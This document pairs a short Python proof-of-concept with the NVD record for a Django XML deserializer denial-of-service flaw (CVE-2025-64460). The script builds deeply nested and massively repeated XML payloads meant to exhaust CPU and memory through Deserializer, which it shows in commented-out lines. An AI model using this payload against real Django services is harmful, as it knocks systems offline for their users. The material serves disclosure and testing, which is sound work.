CVE-2025-64460

import xml.etree.ElementTree as ET # Malicious XML payload designed to trigger algorithmic complexity # in Django's XML deserializer getInnerText() function def generate_malicious_xml(): # Generate XML with deeply nested elements # This exploits the O(n^2) complexity in getInnerText() xml_content = '''<?xml version="1.0"?> <data> <item> <content>''' + '<nested>' * 10000 + 'text' + '</nested>' * 10000 + '''</content> </item> </data>''' return xml_content # Alternative: XML with many sibling elements def generate_exponential_xml(): items = ''.join(['<item>payload</item>' for _ in range(100000)]) return f'''<?xml version="1.0"?> <root>{items}</root>''' # Example usage with Django's XML deserializer # from django.core.serializers.xml_serializer import Deserializer # # malicious_xml = generate_malicious_xml() # deserializer = Deserializer(malicious_xml) # for obj in deserializer: # pass # This will trigger DoS condition if __name__ == '__main__': print('Generating malicious XML payload...') xml = generate_malicious_xml() print(f'Generated {len(xml)} bytes of malicious XML') # Test parsing locally import time start = time.time() try: root = ET.fromstring(xml) print(f'Parse completed in {time.time() - start:.2f}s') except Exception as e: print(f'Parse failed: {e}')

{"cve": {"id": "CVE-2025-64460", "sourceIdentifier": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "published": "2025-12-02T16:15:56.013", "lastModified": "2025-12-10T21:47:14.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 5.2 before 5.2.9, 5.1 before 5.1.15, and 4.2 before 4.2.27.\nAlgorithmic complexity in `django.core.serializers.xml_serializer.getInnerText()` allows a remote attacker to cause a potential denial-of-service attack triggering CPU and memory exhaustion via specially crafted XML input processed by the XML `Deserializer`.\nEarlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected.\nDjango would like to thank Seokchan Yoon for reporting this issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-407"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.2.27", "matchCriteriaId": "5208B938-135B-4682-9340-C15B7329ABA6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.1", "versionEndExcluding": "5.1.15", "matchCriteriaId": "37B0F07E-F8EA-4DFF-8ED9-C60A79A9ED24"}, {"vulnerable": true, "criteria": "cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.2", "versionEndExcluding": "5.2.9", "matchCriteriaId": "C523418D-ACB5-4E97-9D05-6879B0F48344"}]}]}], "references": [{"url": "https://docs.djangoproject.com/en/dev/releases/security/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://groups.google.com/g/django-announce", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Mailing List", "Release Notes"]}, {"url": "https://www.djangoproject.com/weblog/2025/dec/02/security-releases/", "source": "6a34fbeb-21d4-45e7-8e0a-62b95bc12c92", "tags": ["Patch", "Vendor Advisory"]}]}}